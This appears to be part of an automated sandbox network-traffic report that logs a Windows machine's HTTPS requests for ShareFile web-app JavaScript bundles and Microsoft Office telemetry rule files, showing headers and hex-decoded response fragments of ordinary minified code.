                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC1576INData Raw: 65 5b 74 5d 2e 6d 61 74 63 68 28 6e 29 29 3b 63 61 73 65 22 4e 75 6d 62 65 72 22 3a 6e 3d 53 74 72 69 6e 67 28 6e 29 3b 63 61 73 65 22 53 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 6c 28 65 5b 74 5d 29 3f 21 21 72 26 26 64 28 65 5b 74 5d 2c 6e 29 3a 65 5b 74 5d 3d 3d 3d 6e 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 55 52 49 2e 68 61 73 51 75 65 72 79 28 29 20 61 63 63 65 70 74 73 20 75 6e 64 65 66 69 6e 65 64 2c 20 62 6f 6f 6c 65 61 6e 2c 20 73 74 72 69 6e 67 2c 20 6e 75 6d 62 65 72 2c 20 52 65 67 45 78 70 2c 20 46 75 6e 63 74 69 6f 6e 20 61 73 20 74 68 65 20 76 61 6c 75 65 20 70 61 72 61 6d 65 74 65 72 22 29 7d 7d 2c 69 2e 6a 6f 69 6e 50 61 74 68 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20
                                                                                                                                                                                                                                                                                Data Ascii: e[t].match(n));case"Number":n=String(n);case"String":return l(e[t])?!!r&&d(e[t],n):e[t]===n;default:throw new TypeError("URI.hasQuery() accepts undefined, boolean, string, number, RegExp, Function as the value parameter")}},i.joinPaths=function(){for(var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC16384INData Raw: 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3d 21 21 74 2c 6f 3d 21 31 3b 69 66 28 21 21 6e 26 26 28 6f 3d 64 28 69 2e 68 6f 73 74 50 72 6f 74 6f 63 6f 6c 73 2c 6e 29 29 2c 6f 26 26 21 72 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 48 6f 73 74 6e 61 6d 65 20 63 61 6e 6e 6f 74 20 62 65 20 65 6d 70 74 79 2c 20 69 66 20 70 72 6f 74 6f 63 6f 6c 20 69 73 20 22 2b 6e 29 3b 69 66 28 74 26 26 74 2e 6d 61 74 63 68 28 69 2e 69 6e 76 61 6c 69 64 5f 68 6f 73 74 6e 61 6d 65 5f 63 68 61 72 61 63 74 65 72 73 29 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 48 6f 73 74 6e 61 6d 65 20 22 27 2b 74 2b 27 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d
                                                                                                                                                                                                                                                                                Data Ascii: tion(t,n){var r=!!t,o=!1;if(!!n&&(o=d(i.hostProtocols,n)),o&&!r)throw new TypeError("Hostname cannot be empty, if protocol is "+n);if(t&&t.match(i.invalid_hostname_characters)){if(!e)throw new TypeError('Hostname "'+t+'" contains characters other than [A-


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                55192.168.2.64978013.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC422OUTGET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 6490
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 26 Aug 2024 12:30:04 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "fae76dae7784930e96292b65feedbc0d"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 b6d1611761652d7a383651f2bf480596.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 9j6czluqcONrhkcMZ3a3cQNxWctPbDaKX4rHBI3nS1wJggsG2HTm6w==
                                                                                                                                                                                                                                                                                Age: 45973
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC6396INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 6d 65 64 69 61 74 69 6f 6e 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 3b 72
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};r
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC94INData Raw: 2d 69 64 22 7d 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 74 2e 41 6e 74 44 43 6f 6e 66 69 67 50 72 6f 76 69 64 65 72 2c 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2c 6e 75 6c 6c 29 29 29 7d 29 29 7d 7d 29 28 29 2c 6d 7d 29 28 29 29 7d 7d 7d 29 29 3b
                                                                                                                                                                                                                                                                                Data Ascii: -id"},e.createElement(t.AntDConfigProvider,null,e.createElement(o,null)))}))}})(),m})())}}}));


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                56192.168.2.64978113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                x-ms-request-id: 960b579e-001e-0046-352f-1ada4b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bdwr75vm8x5tbp6sg00000000m00000000043w5
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                57192.168.2.64978213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                x-ms-request-id: ed02cc85-901e-0015-15f6-19b284000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bd6kqv2c47qpxmgb000000001h000000000558f
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                58192.168.2.64978413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 632
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                x-ms-request-id: daab1690-601e-0070-11cb-19a0c9000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bdd4z6mz0c833nvec000000019000000000x44q
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                59192.168.2.64978313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 1633ae45-701e-006f-7504-1aafc4000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bdd4z6mz0c833nvec0000000180000000012w82
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                60192.168.2.64978613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC576OUTGET /sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 10:38:23 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 09 Oct 2024 10:30:30 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 8ppNPz1t3YM07LXrVQjXg-x10pBWxJ3zDH29fBxYqZONl-GcRnBpGw==
                                                                                                                                                                                                                                                                                Age: 26813
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                61192.168.2.64978513.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC603OUTGET /sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 458835
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Aug 2024 17:12:16 GMT
                                                                                                                                                                                                                                                                                ETag: "735cba16bf1442c21b8fa8e78aa8e83a"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 b6d1611761652d7a383651f2bf480596.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: sy2KPfPYo5Ox1BCsp0O-kzq-uFPs6GMBlsnMdYO_RTQHBT4d4jRHng==
                                                                                                                                                                                                                                                                                Age: 45974
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 6e 6f 74 69 66 69 63 61 74 69 6f 6e 63 65 6e 74 65 72 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},c={};return Object.definePro
                                                                                                                                                                                                                                                                                2024-10-09 18:05:15 UTC16384INData Raw: 78 65 63 75 74 65 54 6f 6b 65 6e 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 57 69 74 68 43 6f 64 65 28 74 2c 6e 2c 69 5b 31 5d 2c 72 29 2c 21 30 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 65 63 75 74 65 54 6f 6b 65 6e 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 57 69 74 68 43 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 69 2c 6f 29 7b 76 61 72 20 73 2c 61 3d 6e 65 77 20 62 28 6e 29 2e 61 64 64 51 75 65 72 79 28 7b 63 6f 64 65 3a 69 2c 72 6f 6f 74 3a 74 7d 29 3b 72 65 74 75 72 6e 28 73 3d 61 2e 68 72 65 66 28 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 72 2e 41 2e 67 65 74 28 73 29 29 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 28 29 2c 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 46 6f 72 6d 73 41 75 74 68 65 6e 74
                                                                                                                                                                                                                                                                                Data Ascii: xecuteTokenAuthenticationWithCode(t,n,i[1],r),!0)},e.prototype.executeTokenAuthenticationWithCode=function(t,n,i,o){var s,a=new b(n).addQuery({code:i,root:t});return(s=a.href(),Promise.resolve(r.A.get(s))).then((function(){o(),delete e.pendingFormsAuthent
